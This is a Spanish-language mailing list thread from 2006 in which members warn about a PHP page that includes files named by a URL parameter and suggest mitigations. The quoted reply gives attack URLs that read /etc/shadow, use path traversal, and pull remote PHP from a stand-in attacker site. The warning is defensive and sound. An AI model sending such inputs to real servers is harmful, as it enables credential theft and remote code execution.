Grácias a todos, estoy tomando nota de todo y en cuanto termine con otro trabajo en el que estoy liada, me pongo a tratar de sacarle el entrecijo a vuestras aportaciones y, si lo consigo :-), a ponerlas en práctica.
Núria 2006/10/17, Pablo Viojo <[EMAIL PROTECTED]>: > > Si, es cierto, lo importante era la idea nada más. > > Saludos, Pablo > > On 10/17/06, carlos campderrós <[EMAIL PROTECTED]> > wrote: > > > > CUIDADÍN!!! imaginate esta dirección: > > http://tu-servidor.com/index.php?url=/etc/shadow o > > > > > http://tu-servidor.com/index.php?url=http://sitio-de-script-kiddies.com/exploit.php > > . > > > > En el primer caso un atacante malicioso podría acceder a cualquier > > archivo del servidor (bueno, puntualizando, a cualquier archivo al que > > el usuario con el que el servidor web se ejecuta tenga acceso) y en el > > segundo, pueden ejecutar el código php que quieran en tu servidor (por > > ejemplo, descargar algun programa en /tmp y ejecutarlo (con los mismos > > permisos que se ejecuta el servidor web)). > > > > soluciones: > > para ambos casos: include("pag_".$_GET['url'].".php"); > > (algo como include("./".$_GET['url']); no funcionaria para el > > segundo caso: > > http://tu-servidor.com/index.php?url=../../../../../../../../etc/shadow > > ) > > > > sólo para el segundo caso (aunque siempre aconsejable): desactivar > > fopen_wrappers (o algo así) en php.ini (y reiniciar el servidor web). > > > _______________________________________________ Lista de distribución Ovillo Para escribir a la lista, envia un correo a Ovillo@lists.ovillo.org Puedes modificar tus datos o desuscribirte en la siguiente dirección: http://lists.ovillo.org/mailman/listinfo/ovillo